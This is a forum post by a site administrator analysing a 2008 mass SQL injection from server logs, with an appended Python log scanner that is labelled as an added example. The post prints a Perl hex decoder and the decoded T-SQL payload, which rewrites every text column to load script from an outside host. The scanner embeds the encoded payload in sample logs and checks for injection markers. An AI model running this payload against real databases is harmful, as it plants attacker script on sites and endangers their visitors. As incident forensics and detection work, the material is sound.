    Aug 22, 2008 06:22 PM|silkyfixer

    When this first happened to me last year, before the massive web attack, I copied all the log files to my Unix box and used grep to parse through the files. It took me a while to pinpoint the injection since it was not in the wild at the time. I had a coder write a decrypt script to decode the hex:


    use strict;
    use warnings;
    my $s = <<"EOF";
    EOF
    $s =~ s/\s+//g;                       # paste the hex from the log between the EOF markers; strip whitespace
    while (length($s) > 0) {
      my $hex = substr($s, 0, 2); $s = substr($s, 2);
      print pack("C", hex($hex));         # one hex pair -> one byte
    }


    Now decoded, you notice that it's what was in the wild:

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    The question is, have they found a new way to inject without the declare, or a way around dequoting the injection? I have a feeling it's a new type of attack and they don't use a declare.

    I will sift through the logs and see what I can find, but it's hard when you have hundreds of sites and log files.

    It would be great if someone could write a trigger for MSSQL so that anytime an update contains %<script etc. it will tell me what site it came from. This would help out greatly as I can then pinpoint where it came from. Maybe mssql-scan :)
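As an added example (not the poster's script or any product's code), here is a Python version of the same two-hex-chars-per-byte decoding run over log lines, flagging a request by what its decoded payload contains rather than by the presence of a DECLARE wrapper, so a variant that drops the declare is still caught. The log lines, their field layout and the SQL wrapper around the hex are constructed for the example; it also goes beyond the post by decoding UTF-16LE (NVARCHAR-style) hex runs.

```python
import re
from urllib.parse import unquote_plus

# The decoded payload quoted in the post, re-encoded as hex so the sample
# log below is self-contained (constructed, not real traffic).
FRAGMENT = ("UPDATE [t] SET [c]=RTRIM(CONVERT(VARCHAR(8000),[c]))"
            "+'<script src=http://www.banner82.com/b.js></script>'")
HEX1 = FRAGMENT.encode("ascii").hex().upper()

# Constructed IIS-style log lines: one with a DECLARE wrapper, one without,
# one clean request. The field layout and wrapper are assumptions.
SAMPLE_LOG = (
    "2008-08-22 18:22:01 GET /page.asp id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=0x" + HEX1 + ";-- 200\n"
    + "2008-08-22 18:22:02 GET /page.asp id=1;SET%20@S=0x" + HEX1 + ";-- 200\n"
    + "2008-08-22 18:22:03 GET /page.asp id=42 200\n"
)

HEX_RUN = re.compile(r"(?:0x)?([0-9A-Fa-f]{40,})")   # long hex runs, with or without 0x
MARKERS = ("<script", "sysobjects", "syscolumns", "exec(", "update ")

def decode_hex_runs(text):
    """Decode each long hex run (2 hex chars -> 1 byte, like the Perl loop).
    Runs whose odd bytes are mostly zero are treated as UTF-16LE (NVARCHAR)."""
    out = []
    for m in HEX_RUN.finditer(text):
        h = m.group(1)
        if len(h) % 2:                      # odd length: drop the dangling nibble
            h = h[:-1]
        raw = bytes.fromhex(h)
        if raw[1::2].count(0) > len(raw) // 4:
            out.append(raw.decode("utf-16-le", "replace"))
        else:
            out.append(raw.decode("latin-1"))
    return out

def scan_log(log_text):
    """Return (line_no, decoded_payload) for lines whose decoded hex
    contains an injection marker, whatever SQL wraps the hex."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for decoded in decode_hex_runs(unquote_plus(line)):
            if any(mk in decoded.lower() for mk in MARKERS):
                hits.append((n, decoded))
                break
    return hits

if __name__ == "__main__":
    for n, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: {payload[:60]}...")
```

Run it over a real access log with `scan_log(open(path).read())`; the line numbers tell you which site and request carried the payload.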